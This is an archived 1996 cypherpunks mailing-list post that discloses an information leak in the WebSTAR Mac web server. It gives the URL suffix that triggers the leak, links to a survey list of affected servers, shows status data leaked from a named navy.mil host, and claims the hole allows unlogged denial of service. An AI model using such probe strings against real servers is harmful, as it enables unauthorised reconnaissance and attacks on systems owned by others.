1996-07-12 - New Mac Web Server Security Hole Discovered

Header Data

From: Cyberdog <eric@clever.net>
To: cypherpunks@toad.com
Message Hash: ff2d0e6d531bd04a4189b7182055d6dfcca8e9577c833efb23fe593597327532
Message ID: <v03007800ae0b14edb270@[204.249.244.13]>
Reply To: N/A
UTC Datetime: 1996-07-12 04:13:44 UTC
Raw Date: Fri, 12 Jul 1996 12:13:44 +0800

Raw message

From: Cyberdog <eric@clever.net>
Date: Fri, 12 Jul 1996 12:13:44 +0800
To: cypherpunks@toad.com
Subject: New Mac Web Server Security Hole Discovered
Message-ID: <v03007800ae0b14edb270@[204.249.244.13]>
MIME-Version: 1.0
Content-Type: text/plain


Try adding /M_A_C_H_T_T_P_V_E_R_S_I_O_N

to any of the URL's at

http://www.netcraft.co.uk/Survey/Reports/960701/ALL/WebSTAR.html

and each server will leak information like

---
http://europa.nadc.navy.mil//M_A_C_H_T_T_P_V_E_R_S_I_O_N
---
WebSTAR, Copyright (c)1995 Chuck Shotton,
Portions (c)1995 StarNine Technologies, Inc. and its Licensors. All rights
reserved.
PowerPC (CW) version

totalCon 343, maxCon 30, listening 29, current 1, high 8, busy 0, denied 0,
timeout 0, maxMem
1140640, currMem 1117024, minMem 1090208, bytesSent 1218888, port 80,
maxTimeout 300,
verboseMessages false, disableLogging false, hideWindow false,
refuseConnections false, upSince
07/11/96:10:48, version 1.2.5(PowerPC (CW))
--

Anyone can use this for denial of service becase this backdoor is so well
hidden it won't show up in the logs!

The vendor has not commited to an instant fix, but they have told their
users not to discuss this on public lists lest their obscurity become
unsecure.

p.s. The copyright part was their lawyer's idea!







Thread